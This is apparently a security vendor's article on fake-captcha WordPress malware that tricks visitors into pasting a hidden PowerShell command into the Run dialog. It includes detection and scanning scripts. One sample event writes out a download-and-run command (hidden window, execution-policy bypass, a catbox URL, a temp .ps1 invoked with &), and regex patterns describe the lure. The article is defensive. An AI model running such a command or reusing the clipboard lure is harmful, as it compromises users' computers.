We have recently received several requests to remove malware that gets visitors to run a malicious command planted in the clipboard behind a fake captcha, and this type of malware appears to be spreading. Here is what we know about it.
Malware that plants a malicious command in the clipboard behind a fake Cloudflare captcha shown when a visitor opens the site.
This malware shows a screen like the one above only once per visitor (a cookie records that it has already been displayed).
The fake captcha instructs the user to do the following in order to view the site:
1 Press the Windows key + R
→ This opens the Run dialog, which executes a command locally
2 In the “verification” window, press Ctrl + V
3 Press Enter to complete
→ The malicious command has already been written to the clipboard by the page, so pasting it and pressing Enter runs it.
Let’s take a look at the malicious command that the malware writes to the clipboard.
(Part of the code has been blurred out because it is dangerous.)
Let’s analyze what this command does.
1 -w h = -WindowStyle Hidden: the PowerShell window starts hidden, so the user sees nothing
2 -ep bypass = -ExecutionPolicy Bypass: the script runs regardless of the configured execution policy
→ These two options alone show that the intent is to be “unobtrusive” and to “bypass constraints”. (powershell.exe accepts abbreviated switch names such as -w and -ep, so a detection rule that only matches the full spellings -WindowStyle and -ExecutionPolicy will miss this command.)
3 The download URL is assembled by string concatenation; the result is https://files.catbox[.]moe/****.txt, and the file is fetched from that URL and saved in a temporary folder
4 The downloaded file is saved under a .ps1 name and executed as is (& is PowerShell’s call operator).
In other words, at this moment the second-stage script is running on the local PC with the privileges of the logged-in user, and the machine is compromised.
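As an added example (not code from the article), the following triage script turns the instruction sequence and the command analysis above into a detection check over process-creation events: a Win+R launch shows up as explorer.exe spawning powershell.exe, and the command carries the hidden window, the execution-policy bypass, a string-assembled URL, a download cradle, and a drop-and-invoke in the temp folder. The switch-abbreviation table and the sample events are this example's own constructions (the URL and file names are placeholders); check the abbreviations against `powershell.exe -?` on your own version.

```python
"""Triage helper for ClickFix-style PowerShell launches (added example, not the
article's own code). Scores process-creation events against the indicators the
lure above leaves behind. Sample events are constructed."""
import re

# powershell.exe accepts abbreviated switch names. A token matches if it is a
# prefix of the full name at least as long as the minimum, or a listed alias.
# (This example's own table; covers the switches relevant to this lure.)
PS_SWITCHES = {
    "windowstyle":     ("w",    ()),
    "executionpolicy": ("ex",   ("ep",)),
    "noprofile":       ("nop",  ()),
    "noninteractive":  ("noni", ()),
    "command":         ("c",    ()),
    "encodedcommand":  ("e",    ("ec", "enc")),
}

TOKEN_RE    = re.compile(r'''"[^"]*"|'[^']*'|\S+''')
CONCAT_RE   = re.compile(r'''(['"])[^'"]*\1\s*\+\s*['"]''')   # 'abc' + 'def'
DOWNLOAD_RE = re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient|curl)\b")
TEMP_RE     = re.compile(r"(?i)\$env:temp|%temp%|\\temp\\")
INVOKE_RE   = re.compile(r'''&\s*[$'"(]''')                    # & $path / & 'path' / & (...)


def canonical_switch(token):
    """Map an abbreviated powershell.exe switch (-w, -ep, -nop, ...) to its full name."""
    if not token or token[0] not in "-/":
        return None
    short = token.lstrip("-/").lower()
    if not short:
        return None
    for full, (minimum, aliases) in PS_SWITCHES.items():
        if short in aliases or (full.startswith(short) and len(short) >= len(minimum)):
            return full
    return None


def assess_event(event):
    """Return (score, reasons) for one event {"parent", "image", "cmdline"};
    the score is simply the number of indicators hit."""
    reasons = []
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return 0, reasons
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    if parent == "explorer.exe":
        reasons.append("parent is explorer.exe (how a Win+R Run-dialog launch appears)")
    tokens = TOKEN_RE.findall(event["cmdline"])
    for i, tok in enumerate(tokens):
        switch = canonical_switch(tok)
        value = tokens[i + 1].strip("\"'").lower() if i + 1 < len(tokens) else ""
        if switch == "windowstyle" and value and "hidden".startswith(value):
            reasons.append("hidden window (%s %s)" % (tok, tokens[i + 1]))
        elif switch == "executionpolicy" and value in ("bypass", "unrestricted"):
            reasons.append("execution policy bypass (%s %s)" % (tok, tokens[i + 1]))
        elif switch == "encodedcommand":
            reasons.append("encoded command")
    cmdline = event["cmdline"]
    if CONCAT_RE.search(cmdline):
        reasons.append("string literal built by concatenation (URL assembled at run time)")
    if DOWNLOAD_RE.search(cmdline):
        reasons.append("download cradle")
    if TEMP_RE.search(cmdline) and INVOKE_RE.search(cmdline):
        reasons.append("drops into a temp folder and invokes it with &")
    return len(reasons), reasons


def triage(events, threshold=3):
    """Return [(index, score, reasons)] for events at or above the threshold."""
    out = []
    for i, ev in enumerate(events):
        score, reasons = assess_event(ev)
        if score >= threshold:
            out.append((i, score, reasons))
    return out


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (Sysmon Event ID 1 / Security 4688 shape, reduced to
# the three fields used here). URL and file names are placeholders, not the real ones.
SAMPLE_EVENTS = [
    {   # the lure: Run dialog -> hidden PowerShell -> concatenated URL -> temp .ps1 -> &
        "parent": r"C:\Windows\explorer.exe",
        "image": PS_EXE,
        "cmdline": r'''powershell -w h -ep bypass -c "$u='https://files.catbox'+'.moe/'+'sample.txt';$p=$env:TEMP+'\stage.ps1';iwr $u -OutFile $p;& $p"''',
    },
    {   # scheduled backup task: bypasses the execution policy but nothing else
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": PS_EXE,
        "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    },
    {   # user opened an interactive PowerShell window from the Start menu
        "parent": r"C:\Windows\explorer.exe",
        "image": PS_EXE,
        "cmdline": "powershell.exe",
    },
]

if __name__ == "__main__":
    for i, score, reasons in triage(SAMPLE_EVENTS):
        print("event %d: score %d" % (i, score))
        for r in reasons:
            print("  -", r)
```

Only the first sample event reaches the threshold; the scheduled task and the interactive shell each hit a single indicator, which is why the check scores several weak signals together rather than alerting on `-ep bypass` alone.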
How to deal with fake captcha malware
In many cases this malware has been planted by tampering with the WordPress index.php and wp-config.php so that the malicious captcha screen is displayed.
If these files have been tampered with (and especially if they are modified again after you have cleaned them), it is highly likely that the attacker has already gained access to the server and planted backdoors and other malicious code across multiple sites on it.
Free WordPress: Malware Scan & Security Plugin [Malware and Virus Detection and Removal]
We recommend performing a malware scan and removal using the plugin linked above.
It is also necessary to close the vulnerability that let the attacker into the server in the first place.
Please refer to the following page:
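As an added example (not the article's own tool or the plugin above), the following scanner walks a WordPress document root and flags files carrying the loader described in this article. The indicators are this example's own, derived from the behaviour described above: a script that writes to the clipboard, a cookie used to show the overlay once, the Win+R / Ctrl+V wording, and the hidden PowerShell launch. The obfuscated-eval check for wp-config.php is a common injection pattern and is an assumption, not something the article documents; the sample files are constructed, with the payload left as a placeholder.

```python
"""Scan a WordPress install for an injected fake-captcha loader (added example,
not the article's own tool). Indicator list and sample files are this example's
own constructions; the obfuscated-eval check is an assumed common pattern."""
import re
import sys
from pathlib import Path

INDICATORS = {
    # the page has to put the command on the clipboard somehow
    "clipboard_write": re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)"),
    # one-time display gate (common in clean code too, so never decisive alone)
    "cookie_gate": re.compile(r"document\.cookie|\$_COOKIE|setcookie\s*\("),
    # wording of the lure
    "lure_text": re.compile(r"(?i)verify (that )?you are human|windows\s*(key)?\s*\+?\s*r\b|ctrl\s*\+?\s*v\b"),
    # the planted command itself, if it is embedded in clear text
    "hidden_powershell": re.compile(r"(?i)powershell[^\n]{0,40}-w\s*h\b|-ep\s*bypass|-executionpolicy\s+bypass"),
    # generic PHP obfuscation used by many injections (assumption, see lead-in)
    "obfuscated_eval": re.compile(r"(?i)eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
}

SCAN_SUFFIXES = {".php", ".js", ".html"}


def scan_source(text):
    """Return the set of indicator names present in one file's contents."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def is_suspicious(text, filename):
    """wp-config.php holds nothing but PHP defines, so any lure, clipboard or
    obfuscation indicator there is tampering. Other files must show the clipboard
    write plus at least one corroborating indicator."""
    hits = scan_source(text)
    if Path(filename).name == "wp-config.php":
        return bool(hits - {"cookie_gate"})
    return "clipboard_write" in hits and len(hits) > 1


def scan_tree(root):
    """Walk a document root; return [(path, sorted indicators)] for suspicious files."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            if is_suspicious(text, path.name):
                findings.append((str(path), sorted(scan_source(text))))
    return findings


# Constructed samples in the shape the article describes; payloads are placeholders.
TAMPERED_INDEX = r"""<?php
define( 'WP_USE_THEMES', true );
if ( ! isset( $_COOKIE['cf_chk'] ) ) { setcookie( 'cf_chk', '1' ); ?>
<div id="cf"><p>Verify you are human: press Windows + R, then Ctrl + V, then Enter.</p></div>
<script>document.getElementById('cf').onclick = function () {
  navigator.clipboard.writeText(atob('...'));   // placeholder for the blurred command
};</script>
<?php }
require __DIR__ . '/wp-blog-header.php';
"""

CLEAN_INDEX = r"""<?php
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';
"""

CLEAN_CONFIG = r"""<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wp' );
$table_prefix = 'wp_';
require_once ABSPATH . 'wp-settings.php';
"""

TAMPERED_CONFIG = CLEAN_CONFIG + "@eval(base64_decode('...'));\n"   # placeholder payload

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(root):
        print(path, ", ".join(hits))
```

Run it against the document root (`python scan_wp.py /var/www/html`) and diff every flagged file against a fresh WordPress download; a clean index.php is three lines long, and nothing in wp-config.php should ever emit HTML or call eval.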
5 free WordPress security measures